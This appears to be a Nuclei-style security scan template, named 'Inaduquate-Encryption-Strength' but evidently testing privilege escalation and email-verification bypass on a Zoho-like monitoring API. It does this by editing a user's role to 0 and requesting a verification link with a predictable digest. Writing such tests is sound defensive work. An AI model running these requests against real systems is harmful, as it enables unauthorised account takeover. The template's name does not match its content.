id: Inaduquate-Encryption-Strength

info:
    name: test
    author: test
    severity: high
    tags: user-alert,super_admin

requests:
   - raw:
      - |
        GET /app/api/users HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json; version=2.0
        Authorization: Zoho-oauthtoken {{access_token}}

      - |
        PUT /app/api/users/{{user_id}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Zoho-oauthtoken {{access_token}}

        {"is_edit_allowed":true,"is_client_portal_user":false,"is_account_contact":false,"is_invited":true,"subscribe_newsletter":false,"alert_settings":{"email_format":1,"anomaly":[],"critical":[],"applogs":[],"trouble":[],"up":[],"alerting_period":{"start_time":"00:00","end_time":"00:00"},"down":[]},"display_name":"User-Alert","is_contact":false,"selection_type":0,"user_role":0,"email_address":"thamaraiselvan.pc+t01655737966944@zohotest.com","image_present":false,"notify_medium":[1]}

      - |
        GET /app/verify/email?digest={{cid}}-1654172672110 HTTP/1.1
        Host: {{Hostname}}
        Authorization: Zoho-oauthtoken {{access_token}}

     extractors:
         - type: json
           part: body
           name: user_id
           internal: true
           json:
             - '.data[0].user_id'

         - type: json
           part: body
           name: cid
           internal: true
           json:
             - '.data.user_id'
     matchers:
          - type: status
            status:
              - 200





